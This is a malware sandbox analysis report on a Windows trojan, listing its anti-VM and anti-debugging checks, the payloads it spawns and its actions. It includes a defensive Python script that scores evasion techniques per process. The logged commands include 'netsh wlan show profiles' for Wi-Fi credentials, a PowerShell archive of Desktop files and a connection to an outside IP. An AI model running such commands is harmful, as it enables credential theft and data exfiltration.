Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe, 00000000.00000002.1733642258.0000000000CFF000.00000040.00000001.01000000.00000003.sdmp, explorha.exe, 00000001.00000002.1730743577.000000000067F000.00000040.00000001.01000000.00000008.sdmp, explorha.exe, 00000002.00000002.1747528068.000000000067F000.00000040.00000001.01000000.00000008.sdmp, explorha.exe, 00000006.00000002.2895332014.000000000067F000.00000040.00000001.01000000.00000008.sdmp, ad0e9cf6d6.exe, 0000000E.00000002.2892507587.00000000003CF000.00000040.00000001.01000000.0000000D.sdmp, MPGPH131.exe, 00000013.00000002.2892343605.0000000000C6F000.00000040.00000001.01000000.00000010.sdmp, MPGPH131.exe, 00000014.00000002.2893211129.0000000000C6F000.00000040.00000001.01000000.00000010.sdmp, ad0e9cf6d6.exe, 00000016.00000002.2892406718.00000000003CF000.00000040.00000001.01000000.0000000D.sdmp, amert.exe, 00000018.00000002.2571780914.000000000068F000.00000040.00000001.01000000.00000011.sdmp, explorgu.exe, 00000019.00000002.2602792989.000000000034F000.00000040.00000001.01000000.00000012.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: rundll32.exe, 0000000D.00000002.2892509768.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, ad0e9cf6d6.exe, 00000016.00000002.2901115112.00000000013D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: ad0e9cf6d6.exe, 0000000E.00000002.2899511665.0000000001587000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Thread information set: HideFromDebugger
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Thread information set: HideFromDebugger
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe File opened: SIWVID
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_05000D4A rdtsc 0_2_05000D4A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00B37BBB mov eax, dword ptr fs:[00000030h] 0_2_00B37BBB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00B3B922 mov eax, dword ptr fs:[00000030h] 0_2_00B3B922
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_004BB922 mov eax, dword ptr fs:[00000030h] 1_2_004BB922
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_004B7BBB mov eax, dword ptr fs:[00000030h] 1_2_004B7BBB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_004BB922 mov eax, dword ptr fs:[00000030h] 2_2_004BB922
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_004B7BBB mov eax, dword ptr fs:[00000030h] 2_2_004B7BBB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
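The sandbox-detection strings listed before this section (VMware virtual disk device path, VirtualBox ACPI DSDT key, "Hyper-V RAW") and the anti-debugging events in this section (HideFromDebugger, DebugPort queries, FS:[30h] PEB reads, rdtsc, analysis-tool window names, SoftICE device names) are easy to read one at a time but hard to weigh across a dozen processes. The Python below is an added triage example, not part of the Joe Sandbox report and not code from the malware: it parses lines in the report's "Source: <subject> <event>: <value>" layout, maps each to the underlying technique and ATT&CK ID (T1497 Virtualization/Sandbox Evasion, T1622 Debugger Evasion), and scores distinct techniques per process. The sample lines are copied from this report (the VBOX line is shortened to the relevant substring), the weights are our own choice, and the low weight on "Hyper-V RAW" rests on the report itself showing that string inside netsh.exe, a system binary, next to the mswsock.dll provider path.

```python
import re
from collections import defaultdict, namedtuple

# Constructed excerpt of report lines. Subjects and values are copied from the report above;
# multi-process subjects are reduced to their first process for this example.
SAMPLE_LINES = [
    r"Source: MPGPH131.exe, 00000014.00000003.2462757282.0000000001225000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}8",
    r"Source: RageMP131.exe, 0000001C.00000002.2892698190.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBn",
    r"Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe, 00000000.00000002.1733642258.0000000000CFF000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: \\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicense",
    r"Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Thread information set: HideFromDebugger",
    r"Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_05000D4A rdtsc 0_2_05000D4A",
    r"Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Open window title or class name: procmon_window_class",
    r"Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Open window title or class name: ollydbg",
    r"Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe File opened: SICE",
    r"Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort",
    r"Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort",
    r"Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_004BB922 mov eax, dword ptr fs:[00000030h] 1_2_004BB922",
]

LINE_RE = re.compile(
    r"^Source: (?P<subject>.+?) "
    r"(?P<event>Binary or memory string|Thread information set|Open window title or class name"
    r"|File opened|Process queried|Code function): (?P<value>.*)$"
)

Technique = namedtuple("Technique", "label weight attack pattern note")
TECHNIQUES = [
    # weight: contribution of one distinct technique to the process score (our own values)
    Technique("vm_vmware_disk", 4, "T1497", re.compile(r"ven_vmware&prod_virtual_disk", re.I),
              "VMware virtual disk device interface path"),
    Technique("vm_vbox_dsdt", 4, "T1497", re.compile(r"HARDWARE\\ACPI\\DSDT\\VBOX__"),
              "VirtualBox ACPI DSDT registry key"),
    # "Hyper-V RAW" is a Winsock catalog provider name; the report shows it inside netsh.exe
    # next to the mswsock.dll path, so by itself it does not prove a hypervisor check: weak.
    Technique("vm_hyperv_string", 1, "T1497", re.compile(r"Hyper-V RAW"),
              "Hyper-V Winsock provider name"),
    Technique("rdtsc_timing", 2, "T1497", re.compile(r"\brdtsc\b"),
              "RDTSC delta measurement"),
    Technique("hide_from_debugger", 5, "T1622", re.compile(r"^Thread information set: HideFromDebugger"),
              "NtSetInformationThread(ThreadHideFromDebugger)"),
    Technique("debug_port_query", 3, "T1622", re.compile(r"^Process queried: DebugPort"),
              "NtQueryInformationProcess(ProcessDebugPort)"),
    # FS:[0x30] is the PEB; runtime and loader code read it legitimately, so alone it is weak.
    Technique("peb_read", 1, "T1622", re.compile(r"fs:\[00000030h\]"),
              "PEB read (BeingDebugged / NtGlobalFlag)"),
    Technique("tool_window_probe", 3, "T1622", re.compile(r"^Open window title or class name: "),
              "FindWindow against debugger / monitor window names"),
    Technique("softice_device_probe", 2, "T1622", re.compile(r"^File opened: (NTICE|SICE|SIWVID)$"),
              "SoftICE driver device name probe"),
]


def process_name(subject):
    """First process named in the subject: a path for behaviour lines, 'name, dump-id' for strings."""
    first = subject.split(",")[0].strip()
    return first.rsplit("\\", 1)[-1]


def classify(line):
    """Return (process, [Technique, ...]) for a report line, or None if it is not a Source line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    text = f"{m['event']}: {m['value']}"
    return process_name(m["subject"]), [t for t in TECHNIQUES if t.pattern.search(text)]


def summarize(lines):
    """Per-process counts of each technique label."""
    per_proc = defaultdict(lambda: defaultdict(int))
    for line in lines:
        hit = classify(line)
        if hit is None:
            continue
        proc, techniques = hit
        for t in techniques:
            per_proc[proc][t.label] += 1
    return {p: dict(c) for p, c in per_proc.items()}


def score(counts):
    """Score distinct techniques, not repetitions: twenty DebugPort queries are one technique."""
    weights = {t.label: t.weight for t in TECHNIQUES}
    return sum(weights[label] for label in counts)


if __name__ == "__main__":
    for proc, counts in sorted(summarize(SAMPLE_LINES).items()):
        print(f"{score(counts):>3}  {proc}  {counts}")
```

Repetition does not raise the score on purpose: MPGPH131.exe issues the DebugPort query six times above, which is still one technique. Feeding the whole report text to summarize() line by line gives the per-process picture the flat list hides, and the notes on each Technique record which native API the sandbox event corresponds to.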

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 193.233.132.56 80
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe "C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe "C:\Users\user\AppData\Local\Temp\1000049001\amert.exe"
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe, SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe, 00000000.00000002.1734062773.0000000000D47000.00000040.00000001.01000000.00000003.sdmp, explorha.exe, explorha.exe, 00000002.00000002.1747986620.00000000006C7000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: Program Manager
Source: ad0e9cf6d6.exe, 0000000E.00000002.2892507587.00000000003CF000.00000040.00000001.01000000.0000000D.sdmp, MPGPH131.exe, 00000013.00000002.2892343605.0000000000C6F000.00000040.00000001.01000000.00000010.sdmp, MPGPH131.exe, 00000014.00000002.2893211129.0000000000C6F000.00000040.00000001.01000000.00000010.sdmp Binary or memory string: MProgram Manager
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000051001\b977f667d6.exe VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\DTBZGIOOSO.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\ONBQCLYSPU.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\VLZDGUKUTZ.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\XZXHAVGRAG.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\XZXHAVGRAG.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
